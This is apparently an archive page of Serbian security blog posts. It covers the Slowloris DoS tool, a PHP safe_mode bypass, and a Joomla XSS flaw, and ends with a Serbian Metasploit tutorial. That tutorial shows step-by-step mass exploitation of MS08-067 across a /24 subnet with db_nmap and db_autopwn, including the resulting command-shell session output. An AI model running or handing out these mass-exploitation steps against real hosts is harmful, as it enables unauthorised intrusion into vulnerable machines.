This seems like a day for some nasty bugs on the web. As I mentioned in my earlier post, latest PHP has new/old flow in it. Two days ago a new tool for doing DoS attacks on Apache web server was released and it’s called Slowloris. From the web page of the creator of this nifty Perl tool: "Slowloris holds connections open by sending partial HTTP requests. It continues to send subsequent headers at regular intervals to keep the sockets from closing. In this way webservers can be quickly tied up. In particular, servers that have threading will tend to be vulnerable, by virtue of the fact that they attempt to limit the amount of threading they’ll allow. Slowloris must wait for all the sockets to become available before it’s successful at consuming them, so if it’s a high traffic website, it may take a while for the site to free up it’s sockets. So while you may be unable to see the website from your vantage point, others may still be able to see it until all sockets are freed by them and consumed by Slowloris. This is because other users of the system must finish their requests before the sockets become available for Slowloris to consume. If others re-initiate their connections in that brief time-period they’ll still be able to see the site. So it’s a bit of a race condition, but one that Slowloris will eventually always win - and sooner than later." Apparently neither Microsoft IIS nor Lighttpd are affected by this flaw. It will be interesting to follow this story in the comming days.
Planeta Srbija
Скуп блогова на српском језику
Архива за 'exploits' категорију
PHP dev team released new version of PHP 5.2.x two days ago. This version brings a few security fixes and a lot of bug squashing. Alas, there was one seriously wrong fix. A bug that we’ll call "PHP safe_mode bypass with exec/system/passthru" was supposedly fixed in this latest version. Supposedly. It’s still there. And here is a proof of concept. I’ll wait with upgrading to 5.2.10.
There is serious XSS vulnerability affecting all Joomla! versions prior to 1.5.11 which was released just a few days ago.DESCRIPTION: JA_Purity template is bundled in Joomla! and fails to sanitized user supplied input. An attacker can inject JavaScript or DHTML that will be saved in the cookie making persistent, running in the context of targeted user browser, allowing him to steal cookies. IMPACT: An attacker can exploit the vulnerability to store persistent XSS. This may lead in steal the targeted user cookies and gain access to the user account. Full disclosure at PacketStorm. So, still using old Joomla!?
Nekada davno, u vremena skoro zaboravljena, kada bi neko hteo da ozbiljno ugrozi neki sistem na Mreži morao bi sam da nađe propust i da napiše eksploit za isti. Za one manje upućene, eksploit je skripta ili program koji napada poznati propust u nekom programu. Pretpostavimo da naša žrtva na svom serveru ima, recimo, FTP server verzije 1.2.3. Ta verzija je zastarela i svi već znaju da se u njoj nalazi propust koji omogućava manje ili više zlonamernim napadačima da uđu na sistem bez pravile provere lozinke. Da bi to zaista radilo potrebno je uspostaviti vezu sa FTP serverom i poslati mu neke komande od kojih će ovaj dobiti epileptični napad i otvoriti vam svoje dveri. Eksploit je programičić koji radi baš to. Prisan je za specifičan progam i, obično, specifičnu verziju tog programa. Sve što radi kada se pokrene jeste izvršavanje malicioznog koda. Dakle, u skoro zaboravljena davna vremena, mlađani haker je morao sam da napiše eksploit. Morao je zapravo da upotrebi mozak kako bi dobio pristup sistemu. Danas… hmm… danas su stvari drugačije. Voleo bih da vas upoznam sa Metasploit projektom. U pitanju je fenomenalan sistem za pisanje eksploita svih vrsta koji u sebi donosi fenomenalnu biblioteku već postojećih eksploita. Kao što naslov kaže - Point. Click. Root. Izaberete žrtvu, kliknete na eksploit koji vas zanima i… dobijete root. Dobro, nije baš tako jednostavno ali se svodi na to. Posebno kada znamo da dobar deo sistema na Internetu čine ne baš ažurirani serveri. "Neće niko nas" je sjajna logika za sigurno uništenje.Šta je zapravo Metasploit? Jedna od mojih omiljenih alatki. Pošto mi je deo posla i tzv. Penetration testiranje Metasploit je jedna od alatki bez koje bi mi posao bio daleko komplikovaniji. Što ne znači da već nije. Dakle, Metasploit je program pisan u Ruby programskom jeziku a sadrži komponente pisane u C i ASM-u. Njegova osnovna svrha je da programerima donese razvojno okruženje za pisanje eksploita i drugih bezbednosnih alatki. Njegov osnovi sistem podrazumeva postojeću biblioteku eksploita koje je moguće konfigurisati po potrebi. Potom se eoksploit izvršava na ciljani server. Ukoliko se sve završi uspešno korisnik dobija pristup sistemu koji je napao. Primer: Upešno izveden napad na VNC server koji se nalazi na Windows 2000 serveru.A sada tema dana - masovna eksploatacija za idiote Ne znam zašto ali kada god vidim neki od naslova "… for dummies" to prevedem kao "… za idiote". Najnovija verzija Metasploita 3.2 donosi jednu sjajnu novinu. Zamislite da se nalazite u situaciji kada treba napasti veći broj sistema. Da, znam… naporno je kliktati i napadati jedan po jedan. Težak je hakerski posao. E pa dragi moji hakeri, novi Metasploit donosi rešenje za bol u vašem zglobu. Mogućnost istovremenog napada većeg broja sistema. Kao primer će nam poslužiti izvršavanje eksploita MS08-067 na port 445 koji je otvoren na većem broju hostova koji se pak nalaze u C klasi adresa. Za početak pokrenite msfconsole na svojoj BSD ili GNU/Linux mašini. Potrebni su vam SQLite3 gem za Ruby kao i novija verzija Nmap skenera. Kada se Metasploit (msf) komandna linija pojavi učitajte sqlite3 drajver:msf > load db_sqlite3 [*] Successfully loaded plugin: db_sqlite3Zatim ćemo upotrebiti db_create komandu za pokretanje nove SQLite3 baze podataka i povezivanje iste na Metasploit sistem: msf > db_create [*] The specified database already exists, connecting [*] Successfully connected to the database [*] File: /root/.msf3/sqlite3.db Kako bismo ubrzali testiranje upotrebićemo db_nmap komandu sa veoma ograničenim nizom komandi. Cilj nam je da nađemo sve mašine kojima ja otvoren port 445 na ciljanoj podmreži:msf > db_nmap -sS -PS445 -p445 -n -T Aggressive AAA.BBB.CCC.0/24 Konačno, pokrećemo db_autopwn komandu sa -e opcijom za eksploataciju, -p opcijom da odredimo ciljani port, -b opcijom za dobijanje shell-a i -m opcijom za pokretanje svih modula sa "ms08_067" stringom u svom imenu:msf > db_autopwn -e -p -b -m ms08_067 Kada se ova komanda izvrši možemo izlistati sve aktivne veze koje smo uspeli da ostvarimo:msf > sessions -l Active sessions =============== Id Description Tunnel – ———– —— 1 Command shell AAA.BBB.CCC.11 -> AAA.BBB.CCC.86 Upotrebimo session -i SID kako bismo se povezali na ciljani sistem: msf > sessions -i 1 [*] Starting interaction with 1… Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.C:\WINDOWS\system32> Voila! Nekada davno je sve ovo bilo zapravo zabavno. A sada…
